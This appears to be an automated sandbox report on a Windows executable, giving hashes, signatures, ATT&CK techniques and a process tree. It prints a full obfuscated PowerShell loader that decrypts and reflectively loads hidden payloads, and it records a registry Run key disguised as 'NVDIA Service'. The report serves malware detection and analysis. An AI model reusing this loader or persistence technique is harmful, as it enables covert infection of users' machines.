2811b96344264d2752dfe7fa5c0d124444a2337745bb66c3836e406c7df2b916

General

Target

给老子冲/影流之王🈹 (5).exe
Size

1.1MB
MD5

98e247275859543e4f338a906b7a0e2d
SHA1

cbc75272194f9b96719635e5a1ad347e8aaeb972
SHA256

c4318f631e8c30ff72114876c9fb3e435941b5bf18ab969c53c26483e5699eb8
SHA512

04cd9e7fd6f36ccdb4fb64ec86fa5c38d2997849f7330c63bf0db4286cea2a8588600afdec8a56ade39c0e718d5e235e762757295e0e745503ebbb147fde1d9a
SSDEEP

24576:G2Bf9f3u+9UjIS1Nl1JPSAqn4HuuwOBJM12nYELdGCLE:G27f3kFaA6intW

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

unsdk.bat.exe

pid process

560 unsdk.bat.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

852 cmd.exe

pid	process
560	unsdk.bat.exe

pid	process
852	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

影流之王🈹 (5).exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Microsoft\Windows\CurrentVersion\Run\NVDIA Service = "C:\\Users\\Admin\\AppData\\Local\\Temp\\给老子冲\\影流之王🈹 (5).exe"	影流之王🈹 (5).exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

影流之王🈹 (5).exeunsdk.bat.exe

pid	process
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
560	unsdk.bat.exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe
1236	影流之王🈹 (5).exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

影流之王🈹 (5).exeunsdk.bat.exe

description pid process

Token: SeDebugPrivilege 1236 影流之王🈹 (5).exe
Token: SeDebugPrivilege 560 unsdk.bat.exe

description	pid	process
Token: SeDebugPrivilege	1236	影流之王🈹 (5).exe
Token: SeDebugPrivilege	560	unsdk.bat.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

影流之王🈹 (5).execmd.execmd.exe

description	pid	process	target process
PID 1236 wrote to memory of 1164	1236	影流之王🈹 (5).exe	cmd.exe
PID 1236 wrote to memory of 1164	1236	影流之王🈹 (5).exe	cmd.exe
PID 1236 wrote to memory of 1164	1236	影流之王🈹 (5).exe	cmd.exe
PID 1164 wrote to memory of 852	1164	cmd.exe	cmd.exe
PID 1164 wrote to memory of 852	1164	cmd.exe	cmd.exe
PID 1164 wrote to memory of 852	1164	cmd.exe	cmd.exe
PID 852 wrote to memory of 560	852	cmd.exe	unsdk.bat.exe
PID 852 wrote to memory of 560	852	cmd.exe	unsdk.bat.exe
PID 852 wrote to memory of 560	852	cmd.exe	unsdk.bat.exe

C:\Users\Admin\AppData\Local\Temp\给老子冲\影流之王🈹 (5).exe
"C:\Users\Admin\AppData\Local\Temp\给老子冲\影流之王🈹 (5).exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1236

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\koodos40\unsdk.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\koodos40\unsdk.bat
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:852

C:\Users\Admin\AppData\Roaming\koodos40\unsdk.bat.exe
"C:\Users\Admin\AppData\Roaming\koodos40\unsdk.bat.exe" -w hidden -c $YEEK='GCVLietCVLiCCVLiurreCVLinCVLitCVLiProCVLicesCVLisCVLi'.Replace('CVLi', '');$POMR='LoCVLiadCVLi'.Replace('CVLi', '');$AGNg='TCVLirCVLiansfCVLioCVLirmCVLiFinaCVLilBCVLilocCVLikCVLi'.Replace('CVLi', '');$plSj='SplCVLiitCVLi'.Replace('CVLi', '');$vQEn='FrCVLioCVLimBCVLiaCVLiseCVLi64SCVLitCVLirinCVLigCVLi'.Replace('CVLi', '');$XaVM='InvCVLiokCVLieCVLi'.Replace('CVLi', '');$wVKZ='ChCVLiangCVLieCVLiExCVLitCVLienCVLisionCVLi'.Replace('CVLi', '');$wHeU='FiCVLirstCVLi'.Replace('CVLi', '');$hLUz='MaiCVLinMCVLiodCVLiuleCVLi'.Replace('CVLi', '');$WUIc='EnCVLitryCVLiPoCVLiinCVLitCVLi'.Replace('CVLi', '');$alFu='ReCVLiaCVLidCVLiLinCVLiesCVLi'.Replace('CVLi', '');$ByBm='CCVLireCVLiaCVLiteCVLiDeCVLicrCVLiyCVLiptorCVLi'.Replace('CVLi', '');function ewixP($AAaRe){$omicA=[System.Security.Cryptography.Aes]::Create();$omicA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$omicA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$omicA.Key=[System.Convert]::$vQEn('XD+9NVavP36xq+/eONlCELUYPWiNze3ftFux/SslCWE=');$omicA.IV=[System.Convert]::$vQEn('vTnI2Q4cYpsFZdMCUt5nXQ==');$zwRBV=$omicA.$ByBm();$oJPPd=$zwRBV.$AGNg($AAaRe,0,$AAaRe.Length);$zwRBV.Dispose();$omicA.Dispose();$oJPPd;}function jlGEQ($AAaRe){$qlsEE=New-Object System.IO.MemoryStream(,$AAaRe);$hzoPC=New-Object System.IO.MemoryStream;$ICTKK=New-Object System.IO.Compression.GZipStream($qlsEE,[IO.Compression.CompressionMode]::Decompress);$ICTKK.CopyTo($hzoPC);$ICTKK.Dispose();$qlsEE.Dispose();$hzoPC.Dispose();$hzoPC.ToArray();}$UsbMc=[System.Linq.Enumerable]::$wHeU([System.IO.File]::$alFu([System.IO.Path]::$wVKZ([System.Diagnostics.Process]::$YEEK().$hLUz.FileName, $null)));$BCmrp=$UsbMc.Substring(3).$plSj(':');$KaFHq=jlGEQ (ewixP ([Convert]::$vQEn($BCmrp[0])));$GjXDD=jlGEQ (ewixP ([Convert]::$vQEn($BCmrp[1])));[System.Reflection.Assembly]::$POMR([byte[]]$GjXDD).$WUIc.$XaVM($null,$null);[System.Reflection.Assembly]::$POMR([byte[]]$KaFHq).$WUIc.$XaVM($null,$null);
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\koodos40\unsdk.bat

Filesize
487KB

MD5
bb6a0d80de3dd26795653ec1bc7eac1a

SHA1
53a7368181af6191d282b59954c3fbbdcdb4f257

SHA256
e55f25f0d19246b03cbaa4ab860917629f681450d19eae7e7dd1fb593e85a93c

SHA512
75fed7438425480912c9f75695388f0b8a7135d4be783e8def9c482fd4467c99d811cf298e7e9f92d3de7a25edb76eb262eab42039cac5c0613b9a79357e4c69

Download Submit
C:\Users\Admin\AppData\Roaming\koodos40\unsdk.bat

Filesize
487KB

MD5
bb6a0d80de3dd26795653ec1bc7eac1a

SHA1
53a7368181af6191d282b59954c3fbbdcdb4f257

SHA256
e55f25f0d19246b03cbaa4ab860917629f681450d19eae7e7dd1fb593e85a93c

SHA512
75fed7438425480912c9f75695388f0b8a7135d4be783e8def9c482fd4467c99d811cf298e7e9f92d3de7a25edb76eb262eab42039cac5c0613b9a79357e4c69

Download Submit
C:\Users\Admin\AppData\Roaming\koodos40\unsdk.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
\Users\Admin\AppData\Roaming\koodos40\unsdk.bat.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/560-68-0x000000001AE60000-0x000000001B142000-memory.dmp

Filesize
2.9MB

Download
memory/560-69-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/560-71-0x0000000002710000-0x0000000002790000-memory.dmp

Filesize
512KB

Download
memory/560-70-0x0000000001D60000-0x0000000001D68000-memory.dmp

Filesize
32KB

Download
memory/560-72-0x000000000271B000-0x0000000002752000-memory.dmp

Filesize
220KB

Download
memory/1236-54-0x0000000000D70000-0x0000000000E84000-memory.dmp

Filesize
1.1MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads